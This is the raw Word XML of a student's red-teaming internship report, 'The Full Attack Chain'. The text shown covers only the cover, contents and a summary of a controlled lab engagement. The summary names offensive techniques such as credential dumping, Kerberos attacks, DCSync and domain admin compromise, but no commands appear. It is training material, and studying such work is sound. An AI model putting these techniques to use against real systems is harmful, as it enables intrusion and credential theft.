                <v:shape style="position:absolute;left:1650;top:8927;width:2756;height:4806" id="docshape39" coordorigin="1651,8927" coordsize="2756,4806" path="m4406,8927l4406,8933,4138,9167,3878,9413,3638,9671,3398,9935,3097,10292,2823,10673,2562,11054,2336,11453,2137,11865,1959,12283,1836,12719,1740,13162,1699,13604,1699,13733,1651,13629,1657,13604,1699,13155,1795,12713,1925,12277,2103,11846,2302,11441,2542,11035,2795,10654,3083,10279,3385,9929,3618,9665,3871,9407,4132,9161,4406,8927xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1650;top:13782;width:254;height:1205" id="docshape40" coordorigin="1651,13782" coordsize="254,1205" path="m1873,14924l1877,14938,1904,14987,1873,14924xm1651,13782l1657,14028,1685,14280,1753,14680,1801,14778,1873,14924,1795,14606,1733,14274,1699,13893,1692,13875,1651,13782xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1650;top:13782;width:254;height:1205" id="docshape41" coordorigin="1651,13782" coordsize="254,1205" path="m1651,13782l1692,13875,1699,13893,1733,14274,1795,14606,1877,14938,1904,14987,1801,14778,1753,14680,1685,14280,1657,14028,1651,13782xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1849;top:15017;width:213;height:406" id="docshape42" coordorigin="1849,15018" coordsize="213,406" path="m1849,15018l2014,15423,2062,15423,1849,15018xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1849;top:15017;width:213;height:406" id="docshape43" coordorigin="1849,15018" coordsize="213,406" path="m1849,15018l2062,15423,2014,15423,1849,15018xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1650;top:13628;width:48;height:265" id="docshape44" coordorigin="1651,13629" coordsize="48,265" path="m1651,13629l1651,13782,1692,13875,1699,13893,1699,13733,1651,13629xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1650;top:13628;width:48;height:265" id="docshape45" coordorigin="1651,13629" coordsize="48,265" path="m1651,13629l1699,13733,1699,13893,1692,13875,1651,13782,1651,13629xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1753;top:14679;width:316;height:744" id="docshape46" coordorigin="1753,14680" coordsize="316,744" path="m1753,14680l1829,14950,1849,15018,2062,15423,2069,15423,1980,15208,1904,14987,1801,14778,1753,14680xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1753;top:14679;width:316;height:744" id="docshape47" coordorigin="1753,14680" coordsize="316,744" path="m1753,14680l1801,14778,1904,14987,1980,15208,2069,15423,2062,15423,1849,15018,1829,14950,1753,14680xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a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786;top:3156;width:1227;height:280" type="#_x0000_t202" id="docshape48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5/22/2026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i w:val="0"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="4427" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="252525"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="252525"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="252525"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="122"/>
        <w:ind w:left="4427" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:spacing w:val="-16"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Chain</w: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302"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="242" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="4427" w:right="5584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Ali Ahsan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CYBERSTAR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="242" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="400" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="36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18610" cy="207454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86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5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CyberStar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>RED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>TEAMING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="264"/>
        <w:ind w:left="219" w:right="578" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>INTERSHIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-23"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>TASK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-21"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>REPORT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tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="713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9"/>
        <w:gridCol w:w="5650"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="371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75" w:lineRule="exact"/>
              <w:ind w:left="125"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="565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75" w:lineRule="exact"/>
              <w:ind w:left="1083"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Ali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="3"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Ahsan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="390" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="371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70" w:lineRule="exact"/>
              <w:ind w:left="125"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Roll </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="565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70" w:lineRule="exact"/>
              <w:ind w:left="1083"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>CSI-B1-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>427</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="390" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="371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70" w:lineRule="exact" w:before="1"/>
              <w:ind w:left="125"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Internship</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Program</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="565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70" w:lineRule="exact" w:before="1"/>
              <w:ind w:left="1083"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Cybersecurity</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Red</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Teaming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="580" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="371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ind w:left="125"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Task </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="565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ind w:left="1083"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>The Full</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Attack </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="405" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="371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85" w:lineRule="exact"/>
              <w:ind w:left="125"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Instructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="565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70" w:lineRule="exact" w:before="15"/>
              <w:ind w:left="1088"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Umar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="3"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Niaz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:after="0" w:line="370" w:lineRule="exact"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Content:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="384" w:lineRule="auto" w:before="218"/>
        <w:ind w:left="720" w:right="5244" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Task 01# Scoping and Planning Phase Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>02#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Cyber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Chain Task 03# Post-Engagement Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="359" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>04#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Report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291"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="221"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In this capstone project, I conducted a complete end-to-end Red Team engagement within a controlled lab environment. The assessment included network reconnaissance, service and vulnerability enumeration, exploitation of vulnerable services, privilege escalation on Linux and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>systems,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>establishment,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>dumping,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>lateral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>movement,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Active Directory enumeration, Kerberos-based attacks, DCSync attacks, and Domain Administrator compromise. I also performed post-engagement cleanup, documented the full attack chain, mapped findings to the MITRE ATT&amp;CK framework, and provided detailed remediation recommendations to improve the overall security posture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="154"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>01#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Scoping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Planning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Phase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="216"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Before any red team engagement begins, professional attackers define the Rules of Engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(RoE).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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outlines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pre-engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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governed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the entire 12-week capstone attack chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="384" w:lineRule="auto" w:before="157"/>
        <w:ind w:right="7007"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Pre-Engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Document </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Objects:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0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Identify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open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ports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running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services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(Target)</w:t>
      </w:r>
